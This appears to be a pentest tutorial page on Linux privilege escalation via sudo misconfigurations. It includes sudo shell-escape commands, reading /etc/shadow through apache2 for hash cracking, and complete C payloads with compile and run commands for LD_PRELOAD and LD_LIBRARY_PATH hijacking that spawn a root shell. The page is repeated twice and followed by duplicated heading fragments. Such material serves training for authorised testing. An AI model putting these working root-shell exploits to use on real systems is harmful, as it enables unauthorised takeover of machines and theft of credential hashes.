Exploiting Sudo

exploiting sudo misconfigurations for privilege escalation

The sudo command, by default, allows you to run a program with root privileges by default, or, security privileges of other uses.

The users generally need to have a password to use sudo and must be permitted via access rules in /etc/sudoers file.

Rules can be used to limit users to certain programs and forgo the password entry requirement.

Run a program as root:

sudo <program_name>

Run a program as a specific user:

sudo -u <username> <program_name>

List all programs a user is allowed (or disallowed) to run:

sudo -l

Known password

Use any of the following if the low privileged user can run sudo or knows the password.

sudo su
sudo -s
sudo -i
sudo /bin/bash
sudo passwd

Shell escape sequences

Some initial programs run with root privileges and any shell spawned by them also runs as root. This is known as a shell escape sequence privilege escalation.

1. Find all programs using the following

sudo -l

2. Head to GTFObins https://gtfobins.github.io/, search for the program name and use the sudo category to find the further steps on to perform the privilege escalation.

Some typical shell escape commands are:

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

Abusing intended functionality

Certain progams like apache2 can be used to read the first lines of files like /etc/shadow to read root user's password hash which can be cracked using john or hashcat.

Environment Variables

Programs running through sudo can inherit environment variables from users environment. In the /etc/sudoers file, if the env_reset option is set, sudo runs program in a new minimal environment.

The env_keep option can be used to keep certain environment variables from user's environment.

Linux checks for its required libraries in a number of locations in a specific order:

Directories listed in the application’s RPATH value.
Directories specified in the LD_LIBRARY_PATH environment variable.
Directories listed in the application’s RUNPATH value.
Directories specified in /etc/ld.so.conf.
System library directories: /lib, /lib64, /usr/lib, /usr/lib64, /usr/local/lib, /usr/local/lib64, and potentially others.

LD_PRELOAD (Shared Object Injection)

The LD_PRELOAD environment variable is used to load a shared object before any others when a program is run.

LD_PRELOAD specifies a library which will be loaded prior to any other library when the program gets executed.

1. Figure out if LD_PRELOAD environment option is available

sudo -l

The output should be like:

Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

2. The following code can be used to abuse the LD_PRELOAD (saved as preload.c)

/* preload.c */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

3. Compile as shored object

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c

4. Start up the program with LD_PRELOAD

Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object:

sudo LD_PRELOAD=/tmp/preload.so program-name-here

As an exaample
sudo LD_PRELOAD=/tmp/preload.so find

This will result in a shell spawn with root privileges.

LD_LIBRARY_PATH (Shared Object Hijacking)

LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

1. Find the list of directories used by the process

ldd <full directory of process>

As an example:
user@debian:~$ ldd /usr/sbin/apache2
	linux-vdso.so.1 =>  (0x00007fff3a156000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f82cf95b000)
	libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007f82cf737000)
	libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007f82cf4fd000)
	libpthread.so.0 => /lib/libpthread.so.0 (0x00007f82cf2e1000)
	libc.so.6 => /lib/libc.so.6 (0x00007f82cef75000)
	libuuid.so.1 => /lib/libuuid.so.1 (0x00007f82ced70000)
	librt.so.1 => /lib/librt.so.1 (0x00007f82ceb68000)
	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f82ce931000)
	libdl.so.2 => /lib/libdl.so.2 (0x00007f82ce72c000)
	libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f82ce504000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f82cfe18000)

2. Create the following code and save it (hijack.c)

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

3. Compile as shared object by selecting any one name from the output of the `ldd` comand. Here we will show the suage of one of the `apache2` shared objects.

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /tmp/hijack.c

4. Start up the program with LD_LIBRARY_PATH

sudo LD_LIBRARY_PATH=/tmp program-name-here

As an example
sudo LD_LIBRARY_PATH=/tmp apache2

A root shell should open.

PreviousExploiting Weak File Permissions NextCron Jobs

Last updated 8 months ago

Was this helpful?

Exploiting Sudo

exploiting sudo misconfigurations for privilege escalation

The sudo command, by default, allows you to run a program with root privileges by default, or, security privileges of other uses.

The users generally need to have a password to use sudo and must be permitted via access rules in /etc/sudoers file.

Rules can be used to limit users to certain programs and forgo the password entry requirement.

Run a program as root:

sudo <program_name>

Run a program as a specific user:

sudo -u <username> <program_name>

List all programs a user is allowed (or disallowed) to run:

sudo -l

Known password

Use any of the following if the low privileged user can run sudo or knows the password.

sudo su
sudo -s
sudo -i
sudo /bin/bash
sudo passwd

Shell escape sequences

Some initial programs run with root privileges and any shell spawned by them also runs as root. This is known as a shell escape sequence privilege escalation.

1. Find all programs using the following

sudo -l

2. Head to GTFObins https://gtfobins.github.io/, search for the program name and use the sudo category to find the further steps on to perform the privilege escalation.

Some typical shell escape commands are:

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more

Abusing intended functionality

Certain progams like apache2 can be used to read the first lines of files like /etc/shadow to read root user's password hash which can be cracked using john or hashcat.

Environment Variables

Programs running through sudo can inherit environment variables from users environment. In the /etc/sudoers file, if the env_reset option is set, sudo runs program in a new minimal environment.

The env_keep option can be used to keep certain environment variables from user's environment.

Linux checks for its required libraries in a number of locations in a specific order:

Directories listed in the application’s RPATH value.
Directories specified in the LD_LIBRARY_PATH environment variable.
Directories listed in the application’s RUNPATH value.
Directories specified in /etc/ld.so.conf.
System library directories: /lib, /lib64, /usr/lib, /usr/lib64, /usr/local/lib, /usr/local/lib64, and potentially others.

LD_PRELOAD (Shared Object Injection)

The LD_PRELOAD environment variable is used to load a shared object before any others when a program is run.

LD_PRELOAD specifies a library which will be loaded prior to any other library when the program gets executed.

1. Figure out if LD_PRELOAD environment option is available

sudo -l

The output should be like:

Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH

2. The following code can be used to abuse the LD_PRELOAD (saved as preload.c)

/* preload.c */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
	unsetenv("LD_PRELOAD");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

3. Compile as shored object

gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c

4. Start up the program with LD_PRELOAD

Run one of the programs you are allowed to run via sudo (listed when running sudo -l), while setting the LD_PRELOAD environment variable to the full path of the new shared object:

sudo LD_PRELOAD=/tmp/preload.so program-name-here

As an exaample
sudo LD_PRELOAD=/tmp/preload.so find

This will result in a shell spawn with root privileges.

LD_LIBRARY_PATH (Shared Object Hijacking)

LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first.

1. Find the list of directories used by the process

ldd <full directory of process>

As an example:
user@debian:~$ ldd /usr/sbin/apache2
	linux-vdso.so.1 =>  (0x00007fff3a156000)
	libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f82cf95b000)
	libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007f82cf737000)
	libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007f82cf4fd000)
	libpthread.so.0 => /lib/libpthread.so.0 (0x00007f82cf2e1000)
	libc.so.6 => /lib/libc.so.6 (0x00007f82cef75000)
	libuuid.so.1 => /lib/libuuid.so.1 (0x00007f82ced70000)
	librt.so.1 => /lib/librt.so.1 (0x00007f82ceb68000)
	libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007f82ce931000)
	libdl.so.2 => /lib/libdl.so.2 (0x00007f82ce72c000)
	libexpat.so.1 => /usr/lib/libexpat.so.1 (0x00007f82ce504000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f82cfe18000)

2. Create the following code and save it (hijack.c)

#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
	unsetenv("LD_LIBRARY_PATH");
	setresuid(0,0,0);
	system("/bin/bash -p");
}

3. Compile as shared object by selecting any one name from the output of the `ldd` comand. Here we will show the suage of one of the `apache2` shared objects.

gcc -o /tmp/libcrypt.so.1 -shared -fPIC /tmp/hijack.c

4. Start up the program with LD_LIBRARY_PATH

sudo LD_LIBRARY_PATH=/tmp program-name-here

As an example
sudo LD_LIBRARY_PATH=/tmp apache2

A root shell should open.

PreviousExploiting Weak File Permissions NextCron Jobs

Last updated 8 months ago

Was this helpful?

Run a program as root:

Run a program as a specific user:

List all programs a user is allowed (or disallowed) to run:

Known password

Shell escape sequences

1. Find all programs using the following

2. Head to GTFObins https://gtfobins.github.io/, search for the program name and use the sudo category to find the further steps on to perform the privilege escalation.

Abusing intended functionality

Environment Variables

LD_PRELOAD (Shared Object Injection)

1. Figure out if LD_PRELOAD environment option is available

2. The following code can be used to abuse the LD_PRELOAD (saved as preload.c)

3. Compile as shored object

4. Start up the program with LD_PRELOAD

LD_LIBRARY_PATH (Shared Object Hijacking)

1. Find the list of directories used by the process

2. Create the following code and save it (hijack.c)

3. Compile as shared object by selecting any one name from the output of the ldd comand. Here we will show the suage of one of the apache2 shared objects.

4. Start up the program with LD_LIBRARY_PATH

Run a program as root:

Run a program as a specific user:

List all programs a user is allowed (or disallowed) to run:

Known password

Shell escape sequences

1. Find all programs using the following

2. Head to GTFObins https://gtfobins.github.io/, search for the program name and use the sudo category to find the further steps on to perform the privilege escalation.

Abusing intended functionality

Environment Variables

LD_PRELOAD (Shared Object Injection)

1. Figure out if LD_PRELOAD environment option is available

2. The following code can be used to abuse the LD_PRELOAD (saved as preload.c)

3. Compile as shored object

4. Start up the program with LD_PRELOAD

LD_LIBRARY_PATH (Shared Object Hijacking)

1. Find the list of directories used by the process

2. Create the following code and save it (hijack.c)

3. Compile as shared object by selecting any one name from the output of the ldd comand. Here we will show the suage of one of the apache2 shared objects.

4. Start up the program with LD_LIBRARY_PATH

3. Compile as shared object by selecting any one name from the output of the `ldd` comand. Here we will show the suage of one of the `apache2` shared objects.

3. Compile as shared object by selecting any one name from the output of the `ldd` comand. Here we will show the suage of one of the `apache2` shared objects.